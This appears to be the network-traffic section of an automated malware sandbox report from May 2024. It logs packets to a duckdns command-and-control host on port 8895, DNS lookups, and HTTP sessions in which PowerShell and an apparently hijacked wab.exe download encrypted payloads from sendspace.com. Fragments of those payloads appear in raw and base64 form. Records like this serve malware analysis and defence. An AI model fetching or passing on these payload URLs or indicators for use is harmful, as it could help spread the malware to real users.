                                                                                                      May 23, 2024 21:10:32.635566950 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:32.642946959 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:33.047425985 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:33.052400112 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:33.276292086 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:33.281411886 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:33.337378025 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:33.342411995 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:33.672930956 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:33.679495096 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:33.884062052 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:33.891952038 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:33.921561003 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:33.926889896 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:34.417723894 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:34.422708988 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:34.505667925 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:34.510708094 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:35.118654013 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:35.175432920 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:35.376266003 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:35.381315947 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:36.141185045 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:36.228898048 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.266673088 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.271969080 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:38.306652069 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.359298944 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:38.359395981 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.364242077 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:38.403748035 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.408858061 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:38.548090935 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.554290056 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:38.647248983 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.652262926 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:38.742106915 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:38.747128010 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:39.020713091 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:39.025732040 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:39.674952030 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:39.679980040 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:39.728250980 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:39.755394936 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:39.756800890 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:39.761703968 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:39.889071941 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:39.894040108 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:39.990164995 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:39.999499083 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:40.350003958 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:40.355097055 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:40.460025072 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:40.465368986 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:40.650065899 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:40.655726910 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:40.773448944 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:40.778490067 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:41.198713064 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:41.203800917 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:41.296132088 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:41.301284075 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:41.316509962 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:41.321554899 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:41.859694004 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:41.864640951 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:42.669975996 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:42.675019979 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:42.688441038 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:42.693521976 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:42.693573952 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:42.698642969 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:42.737145901 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:42.742660999 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:42.932307959 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:42.937380075 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:43.182346106 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:43.187424898 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:43.298918009 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:43.304606915 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:43.304663897 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:43.310177088 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:43.538285971 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:43.543261051 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:43.866143942 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:43.871226072 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:44.027904034 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:44.034568071 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:44.116872072 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:10:44.122030973 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:10:44.254518032 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.861675024 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.892596006 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.897536039 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:01.923345089 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:01.939935923 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.120148897 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.125509977 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.183068037 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.191293955 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.209866047 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.215188980 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.351646900 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.443205118 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.443268061 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.449712038 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.469312906 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.485785961 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.485863924 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.498383999 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.498455048 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.504719019 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.504798889 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.512104988 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.545716047 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.551884890 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.600070000 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.659605980 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.671554089 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.676740885 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.744504929 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.752548933 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.781102896 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.787873983 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:02.915730953 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:02.959481955 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.044439077 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.052169085 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.753504992 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.803374052 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.868086100 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.931461096 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:03.931524038 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:03.936490059 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.176470995 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.181531906 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.285801888 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.290781021 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.295761108 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.306139946 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.306976080 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.315789938 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.413070917 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.450511932 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.450556040 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.455461025 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.494616032 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.522414923 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.526077032 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.537151098 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.557684898 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.592417955 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.603842974 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.916475058 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.916565895 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.944701910 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:04.973469019 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:04.985155106 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:05.093074083 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:05.105305910 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:05.285842896 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:05.291013002 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:05.301457882 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:05.316572905 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:06.119277000 CEST88954972012.202.180.134192.168.2.10
                                                                                                      May 23, 2024 21:11:06.229104996 CEST497208895192.168.2.1012.202.180.134
                                                                                                      May 23, 2024 21:11:16.695615053 CEST497208895192.168.2.1012.202.180.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 21:08:08.175980091 CEST | 60769 | 53 | 192.168.2.10 | 1.1.1.1
May 23, 2024 21:08:08.186875105 CEST | 53 | 60769 | 1.1.1.1 | 192.168.2.10
May 23, 2024 21:08:09.114473104 CEST | 64719 | 53 | 192.168.2.10 | 1.1.1.1
May 23, 2024 21:08:09.126405954 CEST | 53 | 64719 | 1.1.1.1 | 192.168.2.10
May 23, 2024 21:08:48.630517960 CEST | 62951 | 53 | 192.168.2.10 | 1.1.1.1
May 23, 2024 21:08:48.679580927 CEST | 53 | 62951 | 1.1.1.1 | 192.168.2.10
May 23, 2024 21:08:53.038440943 CEST | 55726 | 53 | 192.168.2.10 | 1.1.1.1
May 23, 2024 21:08:53.294584036 CEST | 53 | 55726 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 21:08:08.175980091 CEST | 192.168.2.10 | 1.1.1.1 | 0xc3f5 | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:09.114473104 CEST | 192.168.2.10 | 1.1.1.1 | 0x356b | Standard query (0) | fs13n3.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:48.630517960 CEST | 192.168.2.10 | 1.1.1.1 | 0x5834 | Standard query (0) | fs03n4.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:53.038440943 CEST | 192.168.2.10 | 1.1.1.1 | 0xf21f | Standard query (0) | nmds.duckdns.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 21:08:08.186875105 CEST | 1.1.1.1 | 192.168.2.10 | 0xc3f5 | No error (0) | www.sendspace.com |  | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:08.186875105 CEST | 1.1.1.1 | 192.168.2.10 | 0xc3f5 | No error (0) | www.sendspace.com |  | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:09.126405954 CEST | 1.1.1.1 | 192.168.2.10 | 0x356b | No error (0) | fs13n3.sendspace.com |  | 69.31.136.57 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:48.679580927 CEST | 1.1.1.1 | 192.168.2.10 | 0x5834 | No error (0) | fs03n4.sendspace.com |  | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 21:08:53.294584036 CEST | 1.1.1.1 | 192.168.2.10 | 0xf21f | No error (0) | nmds.duckdns.org |  | 12.202.180.134 | A (IP address) | IN (0x0001) | false
                                                                                                      • www.sendspace.com
                                                                                                      • fs13n3.sendspace.com
                                                                                                      • fs03n4.sendspace.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49711 | 104.21.28.80 | 443 | 4904 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:08:08 UTC | 174 | OUT | GET /pro/dl/ow9148 HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: www.sendspace.com
                                                                                                      Connection: Keep-Alive
2024-05-23 19:08:09 UTC | 941 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Date: Thu, 23 May 2024 19:08:09 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=3aktu6pqgs2ccv85cuu46alob0; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Location: https://fs13n3.sendspace.com/dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb
                                                                                                      Vary: Accept-Encoding
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eJZGl3tFzKgNKMctSWMlM9q8UjPcDm0VRr%2BXOd757LMiouyGPvOz6V%2FeTTQR91iQaCaZO0uVRUANkss8%2BMtxQgOMgczfKCv93kzTne5a5W%2F5tZvjRBTsds7WnzrWFZAwRK6K3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8887553b18fb182d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
2024-05-23 19:08:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49712 | 69.31.136.57 | 443 | 4904 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:08:10 UTC | 232 | OUT | GET /dlpro/3f6d43e0acc954908c31e25fcf4bf945/664f9418/ow9148/Supervene.pfb HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: fs13n3.sendspace.com
                                                                                                      Connection: Keep-Alive
2024-05-23 19:08:10 UTC | 498 | IN | HTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 23 May 2024 19:08:09 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 466008
                                                                                                      Last-Modified: Fri, 17 May 2024 15:09:26 GMT
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=pruh7kht80maq0grlkuo326ad7; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Content-Disposition: attachment;filename="Supervene.pfb"
                                                                                                      ETag: "66477326-71c58"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Data Ascii: x63dpXjZNJauI2OJzv3HjpjZNkyaaZMGRKgVSHN0awxdVkEjj8KXyjKdSS0tI/5wzOR1Cb6NpiXksmkln9XQMG+pPUyah1WuGTf2kEanZ+aQx5uV4MebleDHm5Xgx5uV4MebleDHm5Xgx5uV4MeeNfGeji5ocEmQy2dbkw3/hLg8XH2t/+qHGOvCkl1+xwqcM0sMp9QK2OTEqWHcriPI4IP5+2VMYyPVe1UAwUJpd29Flki5JS5fY6WYY2p4aBP
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 63 4c 35 44 32 50 66 48 48 5a 49 76 43 62 6d 4e 34 30 68 4e 63 57 51 69 53 35 72 48 66 33 67 58 48 46 44 33 71 4f 34 51 4b 4c 6f 54 41 61 75 4f 4b 42 59 50 39 34 51 4a 4a 69 46 79 57 32 69 73 4e 50 62 6d 58 57 44 32 4c 72 4c 6a 53 6f 35 6d 62 6a 49 65 67 4e 74 7a 5a 62 79 42 6a 34 65 75 70 54 59 59 33 66 2f 33 72 36 38 55 51 72 4a 64 66 75 65 4b 50 44 61 76 78 33 4b 68 52 6e 53 58 6e 4c 38 34 4f 44 36 6d 70 54 57 72 72 4f 6b 6a 72 2f 72 68 65 79 4e 62 4f 47 37 55 70 4b 42 78 71 38 57 6f 51 35 4d 69 45 42 7a 71 43 64 6e 35 57 63 51 56 63 45 4e 62 4c 69 31 59 46 6c 75 31 34 4d 68 73 78 36 35 50 49 38 58 51 77 67 36 65 61 6a 74 79 64 32 4f 55 57 51 33 69 78 38 41 6e 54 74 6a 6a 42 4f 71 76 61 7a 37 44 78 78 64 32 37 76 44 6a 32 2f 42 4b 48 42 64 79 50 6c 66
                                                                                                      Data Ascii: cL5D2PfHHZIvCbmN40hNcWQiS5rHf3gXHFD3qO4QKLoTAauOKBYP94QJJiFyW2isNPbmXWD2LrLjSo5mbjIegNtzZbyBj4eupTYY3f/3r68UQrJdfueKPDavx3KhRnSXnL84OD6mpTWrrOkjr/rheyNbOG7UpKBxq8WoQ5MiEBzqCdn5WcQVcENbLi1YFlu14Mhsx65PI8XQwg6eajtyd2OUWQ3ix8AnTtjjBOqvaz7Dxxd27vDj2/BKHBdyPlf
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 36 46 76 37 6f 65 4d 45 42 36 62 2f 4d 66 67 49 32 46 75 6a 69 64 2b 4d 78 74 56 6f 32 53 52 65 72 59 63 54 44 72 58 58 75 35 58 6f 30 45 78 66 76 45 65 62 6c 52 67 32 4b 56 6f 66 50 48 56 73 6f 55 61 54 69 77 56 75 2b 4c 5a 6f 32 2f 75 63 45 56 58 44 69 59 5a 78 75 35 58 54 56 4b 4d 75 74 64 65 37 6c 65 41 2f 33 6f 58 51 78 35 50 62 4f 48 4d 72 58 61 33 48 68 49 31 56 39 78 33 36 6e 4f 50 55 4c 58 6b 66 47 34 58 67 7a 43 4c 4a 42 73 31 6a 6d 6b 48 53 6f 43 4f 4c 6b 31 2b 74 2f 33 6b 72 6c 65 44 48 59 33 2f 31 6c 36 75 51 57 4e 69 72 44 30 67 62 4d 34 72 61 33 35 72 41 4b 4e 69 71 79 36 39 45 41 35 6f 71 70 34 59 64 57 52 38 62 68 65 44 50 41 38 49 77 35 35 75 61 6e 4c 6c 53 6f 64 53 38 45 51 58 55 2f 47 50 59 55 35 6e 73 4a 36 50 42 2b 41 6a 54 6e 72 6b
                                                                                                      Data Ascii: 6Fv7oeMEB6b/MfgI2Fujid+MxtVo2SRerYcTDrXXu5Xo0ExfvEeblRg2KVofPHVsoUaTiwVu+LZo2/ucEVXDiYZxu5XTVKMutde7leA/3oXQx5PbOHMrXa3HhI1V9x36nOPULXkfG4XgzCLJBs1jmkHSoCOLk1+t/3krleDHY3/1l6uQWNirD0gbM4ra35rAKNiqy69EA5oqp4YdWR8bheDPA8Iw55uanLlSodS8EQXU/GPYU5nsJ6PB+AjTnrk
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 48 41 68 58 50 66 2f 57 58 75 6a 4c 66 34 53 43 6e 72 62 59 54 66 35 64 62 52 6e 71 33 77 71 45 43 4a 4a 58 76 4e 64 33 51 5a 77 4f 30 72 47 33 62 61 70 6d 2f 73 4d 74 57 48 38 4d 74 55 35 35 6e 34 35 42 48 77 4b 45 32 52 41 78 76 72 50 49 6e 39 6e 38 55 65 44 44 64 4d 2f 6c 58 34 6c 58 72 51 61 46 4a 62 6a 55 32 64 33 66 43 30 48 4a 4a 65 78 62 6b 69 79 43 63 52 5a 45 69 70 31 4b 39 78 52 30 30 2b 55 41 5a 63 75 69 34 63 66 73 4c 70 52 7a 4f 35 76 49 73 76 6c 54 38 34 56 59 76 64 6a 4a 67 4c 53 33 59 73 37 45 77 46 75 57 4b 55 73 39 46 41 34 47 4b 68 55 51 32 4a 31 46 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 44 70 35 6f 62 36 48 48 71 46 63 37 31 4a 74 35 76 39 59 73 49 31 4e 6e
                                                                                                      Data Ascii: HAhXPf/WXujLf4SCnrbYTf5dbRnq3wqECJJXvNd3QZwO0rG3bapm/sMtWH8MtU55n45BHwKE2RAxvrPIn9n8UeDDdM/lX4lXrQaFJbjU2d3fC0HJJexbkiyCcRZEip1K9xR00+UAZcui4cfsLpRzO5vIsvlT84VYvdjJgLS3Ys7EwFuWKUs9FA4GKhUQ2J1F4MebleDHm5Xgx5uV4MebleDHm5Xgx5uV4MebleDDp5ob6HHqFc71Jt5v9YsI1Nn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49718 | 104.21.28.80 | 443 | 8172 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:08:48 UTC | 175 | OUT | GET /pro/dl/ougyql HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Cache-Control: no-cache
2024-05-23 19:08:48 UTC | 946 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 19:08:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=5hrvd3jvoolunq5gv3jhegf975; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PC40M0Bx2cpmJ%2FACmR1k7fM3W0C0bQ3wXfYvxOQ9TSMHsfMPezNDCmUplRvRrEciO4S3avYA9rlrR8wleJMkrU2xxMOPYQUFaREq1IW%2Fn%2BRqHH59VR2XAjoIukNYzc8qO1aJuw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 88875632cc6943c2-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 19:08:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49719 | 69.31.136.17 | 443 | 8172 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-23 19:08:49 UTC | 304 | OUT | GET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: fs03n4.sendspace.com
Connection: Keep-Alive
Cookie: SID=5hrvd3jvoolunq5gv3jhegf975
2024-05-23 19:08:49 UTC | 428 | IN | HTTP/1.1 200 OK
Server: nginx
